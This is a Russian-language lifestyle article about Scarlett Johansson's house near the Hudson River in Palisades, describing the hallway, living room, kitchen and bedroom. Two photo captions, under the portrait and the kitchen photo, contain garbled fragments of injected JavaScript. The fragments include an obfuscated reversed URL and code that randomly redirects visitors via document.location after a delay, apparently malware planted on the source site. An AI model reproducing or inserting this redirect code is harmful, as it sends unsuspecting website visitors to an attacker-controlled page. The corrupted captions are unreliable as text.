Добавить в закладки

Сказочный дом Скарлетт Йоханссон за 4 миллиона долларов

Невозможно представить серию фильмов вселенной Marvel «Мстители» без очаровательной и талантливой Скарлетт Йоханссон.

Скарлетт Йоханссон

Скарлетт Йоханссон. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/74/6b/53c7de0d7bcf4eee8ca13eea6b74.jpg»>img08.rl0.ru

Успешная карьера дает возможность выбирать молодой артистке любые места для жительства. В 2018 году она решила сбежать от суеты мегаполиса в близлежащую от Нью-Йорка деревушку Палисейд. Здесь ей приглянулся очаровательный четырехкомнатный домик, из окон которого открывается волшебный вид на реку Гудзон. За двухэтажное здание с бассейном и уютной террасой во дворе Скарлетт отдала 4 миллиона долларов. Предлагаем подробнее рассмотреть интерьер «звездного» жилья.

Дом Скарлетт Йоханссон в Палисейде

Дом Скарлетт Йоханссон в Палисейде. Фото: lux.fm

Встречает хозяев и гостей дома уютная прихожая

За прозрачной двухстворчатой входной дверью расположена прихожая, ведущая к остальным помещениям. Справа от входа в стене сделаны полки разного размера для книжек, статуэток и прочих мелочей. Слева нишу занял шкаф для верхней одежды. Дальше разместилась мягкая мебель, сидя на которой можно наблюдать за костром в камине или же смотреть телевизор, висящий над очагом.

Фрагмент прихожей

Фрагмент прихожей. Фото: lux.fm

У окна с дополнительным выходом сделана еще одна система хранения вещей в виде тумбы, выдвижных ящиков и навесных открытых полок.

Фрагмент прихожей

Фрагмент прихожей. Фото: thesun.co.uk

На первом этаже расположена главная комната – гостиная

В помещение попадает много солнечного света из-за больших окон и точечной подсветки, раскиданной в каждом углу потолка. Полы сделаны из лакированных деревянных дощечек, прикрытых в некоторых местах узорчатыми коврами. В центральной стене вмонтирован камин, снаружи украшенный деревянной рамой, а сверху серебряными подсвечниками и небольшим зеркалом. Напротив него разместились мягкие кресла с диванами в стиле ретро, а также стеклянный журнальный столик. Рядом с окном стоит старинный комод с двумя креслами и книжными стеллажами по двум сторонам.

Фрагмент гостиной

Фрагмент гостиной. Фото: static.life.ru

С противоположной стороны стену украсили несколько картин и небольшой деревянный консоль.

Фрагмент гостиной

Фрагмент гостиной. Фото: content.mediastg.net

Оттенок кухонной деревянной мебели хорошо смотрится с светло-серым фартуком

Гарнитур занял место около нескольких стен. Между верхним и нижним рядом шкафов в рабочей зоне выложен фартук из мелкой керамической плитки. Столешницы сделаны из натурального дерева. Центр кухни занял двухуровневый остров, исполняющий роль барной стойки и дополнительной рабочей поверхности.

Кухня

Кухня. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton-Spring-Road-17.jpg»>marieclaire.ua

С веранды спальни можно любоваться рекой

Стены одной из спален окрашены в серый цвет. Середину комнаты заняла двуспальная кровать с металлическим фигурным изголовьем. С двух ее сторон расставлены подставки для ночников с выдвижным ящиком и нижней полкой. На полу раскинут ковер, а рядом с окном стоит винтажное кресло.

Спальня

Спальня. Фото: lux.fm

Раскрыв занавески цвета спелого персика открывается захватывающая картина живописной природы.

Вид на реку с окон спальни

Вид на реку с окон спальни. Фото: zvezdy.com.ua

Дом в месте удивительной красоты даст возможность хозяевам забыть о всех невзгодах, наслаждаться тишиной и полным спокойствием.

 

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 06.08.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: